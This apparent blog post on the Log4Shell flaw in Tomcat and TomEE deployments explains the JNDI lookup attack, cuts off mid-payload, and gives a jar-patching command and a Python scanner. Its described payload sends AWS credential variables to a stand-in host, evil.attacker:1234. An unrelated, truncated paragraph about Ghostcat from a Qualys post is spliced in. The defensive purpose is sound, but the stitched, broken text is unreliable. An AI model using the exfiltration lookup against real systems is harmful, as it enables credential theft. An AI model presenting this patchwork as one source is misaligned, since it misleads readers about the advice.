If you’ve been following tech news over the last couple of days, you’ll very likely have heard about CVE-2021-44228, or “Log4Shell” as it has become known. This particular vulnerability affects Apache Log4j2, a Java logging framework. Tomcat, TomEE, and ActiveMQ themselves do not ship with log4j2, so running out-of-the-box with their default configuration they are not vulnerable to this issue.

However, before you breathe a sigh of relief, you should be aware that applications deployed on either TomEE or Tomcat can include additional Java libraries bundled inside. Any jar file included in a web application’s WEB-INF/lib directory will be added to the application’s classpath and can be used by code in the application. Your applications may be including log4j2 as a conscious logging choice, or it may be included as a transitive dependency of another library or framework your application is using. Either way, you ought to check your web applications for the presence of log4j2 (look for log4j-core*.jar) and take mitigating actions.

Since this article was published, a further CVE, CVE-2021-45046, has been made public, and the previous mitigation of setting log4j2.noFormatMsgLookup to true does not guard against it. Users are advised to update log4j2 to 2.16.0.

The vulnerability detail is available as part of the CVE here:, and also on the Log4j2 webpage here:

“Apache Log4j2 <=2.14.1 JNDI features used in the configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.”

This is perhaps a little difficult to digest, so it helps to understand what’s going on with the help of a simple example. Like other vulnerabilities such as cross-site scripting (XSS), this starts with untrusted user input. Log4j2 has a JNDI plugin, which can be used to look up values bound in JNDI. For example, it could be used to set the logging path for an application, and if that path needs to be changed for some reason, it can be changed in JNDI, rather than requiring the application to be rebuilt. However, if an attacker is able to supply a specially crafted string to an application, such as $

The above would look for the environment variables AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY and send them to the host evil.attacker:1234 as a query string. If you’re running a server in EC2 on AWS and those environment variables are defined, the attacker would then be able to spin up and control machines in your AWS account.

Beyond environment variables, attackers could use Log4j2 lookups to form query strings that obtain Java process arguments and system properties, Kubernetes environment attributes, Docker attributes, and more. See Log4j2’s Lookups documentation for a full list of sources.

Most critically, it should be noted that this form of attack is not Java version specific. If you are on the patched version of Java 8 and beyond, you are still vulnerable to this form of information disclosure. We have verified this attack on Java 11 and onwards.

There are a couple of mitigations available to you if you are running an application with a vulnerable version of log4j2.

Alternatively, as noted in Log4j2’s documentation, you can remove the JndiLookup class from the jar file: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

As previously reported, a severe vulnerability exists in Apache Tomcat’s Apache JServ Protocol. The Chinese cyber security company Chaitin Tech discovered the vulnerability, named “Ghostcat”, which is tracked as CVE-2020-1938 and rated critical severity with a CVSS v3 score of 9.8. This blog post details how web application security teams can detect this vulnerability using Qualys Web Application Scanning (WAS). This new Qualys WAS detection complements the detection that uses Qualys VMDR®.

About CVE-2020-1938

Apache Tomcat web servers are widely used for deploying Java-based web applications.
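The log4j-core presence check described above, as an added Python example that is not part of the original post: it walks a webapps tree for WEB-INF/lib/log4j-core*.jar, reads the version from the Maven pom.properties that real log4j-core jars carry under META-INF/maven, and reports whether the JndiLookup class (the entry the zip -q -d mitigation deletes) is still inside. The demo builds a constructed webapps directory with stand-in jars, not real Apache artifacts.

```python
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

def inspect_jar(path):
    """Version from the Maven pom.properties inside log4j-core, plus whether
    JndiLookup.class (the entry the `zip -q -d` mitigation deletes) is still there."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(\d+\.\d+\.\d+)", props, re.M)
            version = m.group(1) if m else None
        return version, JNDI_LOOKUP in names

def scan_webapps(root):
    """Find WEB-INF/lib/log4j-core*.jar under a webapps tree; flag jars that still
    carry JndiLookup and are below 2.16.0 (the advised version) or unversioned."""
    findings = []
    for dirpath, _, files in os.walk(root):
        if not dirpath.replace(os.sep, "/").endswith("WEB-INF/lib"):
            continue
        for name in sorted(files):
            if name.startswith("log4j-core") and name.endswith(".jar"):
                path = os.path.join(dirpath, name)
                version, jndi = inspect_jar(path)
                v = tuple(int(x) for x in version.split(".")) if version else None
                findings.append({"jar": path, "version": version, "jndi_lookup_present": jndi,
                                 "needs_action": jndi and (v is None or v < (2, 16, 0))})
    return findings

def make_sample_jar(path, version, include_jndi):  # constructed stand-in, not a real artifact
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # placeholder class bytes

def demo():
    """Constructed tree: 'shop' unpatched, 'api' with JndiLookup removed, 'cms' on 2.16.0."""
    root = tempfile.mkdtemp()
    for app, ver, jndi in (("shop", "2.14.1", True), ("api", "2.14.1", False), ("cms", "2.16.0", True)):
        lib = os.path.join(root, app, "WEB-INF", "lib")
        os.makedirs(lib)
        make_sample_jar(os.path.join(lib, f"log4j-core-{ver}.jar"), ver, jndi)
    return scan_webapps(root)
```

Point scan_webapps at a real Tomcat or TomEE webapps directory to get the same per-jar findings for deployed applications.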